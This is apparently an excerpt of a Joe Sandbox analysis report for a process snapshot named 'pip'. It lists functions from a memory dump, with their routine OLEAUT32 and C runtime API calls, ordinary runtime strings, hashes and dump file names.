Instruction ID: 247dc581281ed12dc9789ff5c86f748390d66c038a9d8b7b6dd84f45559b16ee
Opcode Fuzzy Hash: d51e9ed8853f2adb26a0844afd3790f3ddd41859ae92e2ef5020b4ca3826d382
Instruction Fuzzy Hash: 63120575A15705AFC758DBA8DD94DAAB3B9BF8C300F14466CF50AABB91CA30F841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6CF049B0 Relevance: 15.2, APIs: 10, Instructions: 174COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(6CF605A8), ref: 6CF049EE
VariantInit.OLEAUT32(?), ref: 6CF049F7
VariantInit.OLEAUT32(?), ref: 6CF049FD
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF04A08
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF04A39
VariantClear.OLEAUT32(?), ref: 6CF04A45
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF04B66
VariantClear.OLEAUT32(?), ref: 6CF04B76
VariantClear.OLEAUT32(?), ref: 6CF04B7C
VariantClear.OLEAUT32(6CF605A8), ref: 6CF04B82

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: 8f46678485445d86089aa71b15108a8fa5c64cf5aa9f8fd6508d498130f738da
Instruction ID: 711fe7e74f1376b27d9a932361f0f6f2fb69736e85eea80bcdbb90bb7597e6a1
Opcode Fuzzy Hash: 8f46678485445d86089aa71b15108a8fa5c64cf5aa9f8fd6508d498130f738da
Instruction Fuzzy Hash: 8F518FB2A002199FCB04DFA4CC90FAEBBB8FF99714F144169E915AB744D734E901DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CEF0CD0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CEF0D3A
std::_Xinvalid_argument.LIBCPMT ref: 6CEF0D60
_memmove.LIBCMT ref: 6CEF0D95
std::_Xinvalid_argument.LIBCPMT ref: 6CEF0DBF
_memmove.LIBCMT ref: 6CEF0E3E

Strings

string too long, xrefs: 6CEF0D5B, 6CEF0DBA
invalid string position, xrefs: 6CEF0D35

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: bc87cb18905306dc5b36a79871e494669bd94f7bea08de679c11dc8be19aa8ea
Instruction ID: 4df5da84330959915836e126b085e644b587c267264d6063b848fe6450955e31
Opcode Fuzzy Hash: bc87cb18905306dc5b36a79871e494669bd94f7bea08de679c11dc8be19aa8ea
Instruction Fuzzy Hash: 8251FB313011449BD724CE5CD980A5EB7FBEBC5314B348A1EE865C7B85DB71ED4287A2

Uniqueness

Uniqueness Score: -1.00%

Function 6CF54409 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 6CF5442E

Part of subcall function 6CF53FC9: Replicator::operator[].LIBCMT ref: 6CF5404C
Part of subcall function 6CF53FC9: DName::operator+=.LIBCMT ref: 6CF54054

DName::operator+.LIBCMT ref: 6CF54487
DName::DName.LIBCMT ref: 6CF544DF

Strings

void, xrefs: 6CF544D7
,..., xrefs: 6CF54473
,<ellipsis>, xrefs: 6CF5447A, 6CF5447F
..., xrefs: 6CF544C2
<ellipsis>, xrefs: 6CF544C9, 6CF544CE

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: 3d28397eead2da2ead5b6dc53ff5fe82039e4a0d81ec17814d0683cebf5c9a58
Instruction ID: 7fffef1158c439ed05a8123d61be0f3142ec4cdf7f09d4bde4ee613420918afe
Opcode Fuzzy Hash: 3d28397eead2da2ead5b6dc53ff5fe82039e4a0d81ec17814d0683cebf5c9a58
Instruction Fuzzy Hash: B321DEB1A02108AFCB01DF58C040AA93FF4EB56389B5082A2ED09CBB16CB30D923CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6CF14B60 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 143COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF14BC8
std::_Xinvalid_argument.LIBCPMT ref: 6CF14BE0
std::_Xinvalid_argument.LIBCPMT ref: 6CF14BFA
_memmove.LIBCMT ref: 6CF14C64
_memmove.LIBCMT ref: 6CF14C81

Strings

string too long, xrefs: 6CF14BDB, 6CF14BF5
invalid string position, xrefs: 6CF14BC3

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: f60082106e441326ed0fb04cc4aa3b7fc9c161f3a1746080a9ef037ad6621829
Instruction ID: e5f93af93f94ad004d0a470350888ecfde56c80072b3712167cca8d53b812843
Opcode Fuzzy Hash: f60082106e441326ed0fb04cc4aa3b7fc9c161f3a1746080a9ef037ad6621829
Instruction Fuzzy Hash: 3141A3333096108BD324CE5DE880F5EFBE9EBD5719B200A2EF052C7E90DB619D858761

Uniqueness

Uniqueness Score: -1.00%

Function 6CF00815 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0240F

Strings

RSUa, xrefs: 6CF00864

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSUa
API String ID: 4225690600-2086061799
Opcode ID: f97a367438fbfccc98a9c10d89d72f6c34bfebf5dbc79b74de88a8cd647ff2e3
Instruction ID: dc6a58d5a18e7f580ad5c369d9a50aff63f87301b41698983a897d51f2697df8
Opcode Fuzzy Hash: f97a367438fbfccc98a9c10d89d72f6c34bfebf5dbc79b74de88a8cd647ff2e3
Instruction Fuzzy Hash: DB314A70F016089FDB00CF69CD94B5EB7B9AF89704F20858AE518E7651CB71D981DF60

Uniqueness

Uniqueness Score: -1.00%

Function 6CF006F9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0240F

Strings

RSqb, xrefs: 6CF00748

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSqb
API String ID: 4225690600-347567867
Opcode ID: ba69afbae235c421f75c2199a881023dc2a622185fe72e724c2e747319bc2cfd
Instruction ID: 123e190ecf4117f7f65bf963351660a0b3cfbfb919bdfcdcc6f5174835371897
Opcode Fuzzy Hash: ba69afbae235c421f75c2199a881023dc2a622185fe72e724c2e747319bc2cfd
Instruction Fuzzy Hash: 49316B74F016089FCB00CFA9CD90B9EBBB9AF88704F20858AE518E7641DB75D9809F60

Uniqueness

Uniqueness Score: -1.00%

Function 6CF00457 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0240F

Strings

RS%e, xrefs: 6CF00494

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RS%e
API String ID: 4225690600-1409579784
Opcode ID: fc85e0ca9fec9a6cc924b50522be78c6063bbcc810133bc6435dc7abb611d20b
Instruction ID: 9246f6499e3fb5ca021398f225398d28cf808c71bf8d341e9ad17c995d394fe9
Opcode Fuzzy Hash: fc85e0ca9fec9a6cc924b50522be78c6063bbcc810133bc6435dc7abb611d20b
Instruction Fuzzy Hash: 4B315AB0B016189FCB10CBA9CC94B9DB7B9AF85704F30859AE518E7642C772D9409F60

Uniqueness

Uniqueness Score: -1.00%

Function 6CEFAA00 Relevance: 12.3, APIs: 8, Instructions: 309COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CEFAA54
VariantInit.OLEAUT32(?), ref: 6CEFAA5B
VariantInit.OLEAUT32(?), ref: 6CEFAA62
VariantInit.OLEAUT32(?), ref: 6CEFAA69
VariantClear.OLEAUT32(?), ref: 6CEFACF2
VariantClear.OLEAUT32(?), ref: 6CEFACF9
VariantClear.OLEAUT32(?), ref: 6CEFAD00
VariantClear.OLEAUT32(?), ref: 6CEFAD07

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: d264a650e351b46f1d1d50c5d29dd68ba39adec798878f8361392b4c0925b32e
Instruction ID: 8c8720a7d251583588488faf8a445264a85735d614dfaf37b81e937b1a17e15e
Opcode Fuzzy Hash: d264a650e351b46f1d1d50c5d29dd68ba39adec798878f8361392b4c0925b32e
Instruction Fuzzy Hash: CDC137716087009FC300DF69C88095ABBF6FFC9708F248A4DE5A59B765D735E846CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CEE4D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CEE4DA9

Part of subcall function 6CF49125: std::exception::exception.LIBCMT ref: 6CF4913A
Part of subcall function 6CF49125: __CxxThrowException@8.LIBCMT ref: 6CF4914F
Part of subcall function 6CF49125: std::exception::exception.LIBCMT ref: 6CF49160

std::_Xinvalid_argument.LIBCPMT ref: 6CEE4DCA
std::_Xinvalid_argument.LIBCPMT ref: 6CEE4DE5
_memmove.LIBCMT ref: 6CEE4E4D

Strings

string too long, xrefs: 6CEE4DC5, 6CEE4DE0
invalid string position, xrefs: 6CEE4DA4

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: da51b90b8a2e41a5e7d8bf6483dae6d0d2623613b198c259d7f5013a13e07981
Instruction ID: 449ee20645d51f2862bda12b92557d1850d87a049385ee035ecb6ac3fa0276fc
Opcode Fuzzy Hash: da51b90b8a2e41a5e7d8bf6483dae6d0d2623613b198c259d7f5013a13e07981
Instruction Fuzzy Hash: 3831B8323046148BD3248EACE880A6AF7F9AB957A5B304A2FE552CBB51D761DC408791

Uniqueness

Uniqueness Score: -1.00%

Function 6CF544E9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6CF54532
DName::operator+.LIBCMT ref: 6CF54539
DName::DName.LIBCMT ref: 6CF5455B
DName::operator+.LIBCMT ref: 6CF54562
DName::operator+.LIBCMT ref: 6CF54569

Strings

throw(, xrefs: 6CF5452A, 6CF54553

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: ad46d537c568617294c271ed6dcf781939d79db5164fbecefac04a663c3d1449
Instruction ID: 116f8bc269799b9f74c302089bdd69523e92b9f78ca839e5d4659c4943404d63
Opcode Fuzzy Hash: ad46d537c568617294c271ed6dcf781939d79db5164fbecefac04a663c3d1449
Instruction Fuzzy Hash: 5101B5B4A00109BFCF04DFA8C845EFE7BB9EB54348F814155EA059B798DB70D96A8B90

Uniqueness

Uniqueness Score: -1.00%

Function 6CF4E9B9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6CF79880,00000008,6CF4EAC1,00000000,00000000,?,?,6CF4D7DD,6CF49DEF,00000000,?,6CF49BD4,6CEE1290,835FE394), ref: 6CF4E9CA
__lock.LIBCMT ref: 6CF4E9FE

Part of subcall function 6CF52438: __mtinitlocknum.LIBCMT ref: 6CF5244E
Part of subcall function 6CF52438: __amsg_exit.LIBCMT ref: 6CF5245A
Part of subcall function 6CF52438: EnterCriticalSection.KERNEL32(6CF49BD4,6CF49BD4,?,6CF4EA03,0000000D), ref: 6CF52462

InterlockedIncrement.KERNEL32(FFFFFEF5), ref: 6CF4EA0B
__lock.LIBCMT ref: 6CF4EA1F
___addlocaleref.LIBCMT ref: 6CF4EA3D

Strings

KERNEL32.DLL, xrefs: 6CF4E9C5

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 78402135b7f820455640b51d7105983c92baaf093aaebc7d0ea2418657726ac6
Instruction ID: 4a22185333b6ef2e6290930e3617660502857c81994b472eb7bd1e67c2e2786b
Opcode Fuzzy Hash: 78402135b7f820455640b51d7105983c92baaf093aaebc7d0ea2418657726ac6
Instruction Fuzzy Hash: 62015B71945B00EFD720DF66C405789FBF0AF51328F50CA0AD5EA96BA1CB74AA48CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6CF08A9A Relevance: 9.1, APIs: 6, Instructions: 130COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEBF

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 63cc4ba19caa60c161ee162c1bd07e8a3a652c15d2a7b4d83c69a9e3f3072b31
Instruction ID: d577e47648c1f74971c8d0fe9fb4cb018dde6ab6dd069dce552ce97df4fe5930
Opcode Fuzzy Hash: 63cc4ba19caa60c161ee162c1bd07e8a3a652c15d2a7b4d83c69a9e3f3072b31
Instruction Fuzzy Hash: 8C416B74B016089FCB00DFA9CD90A9EB7FAAF89704F20858AE419DB756DB31E841DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CF08DE8 Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEBF

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
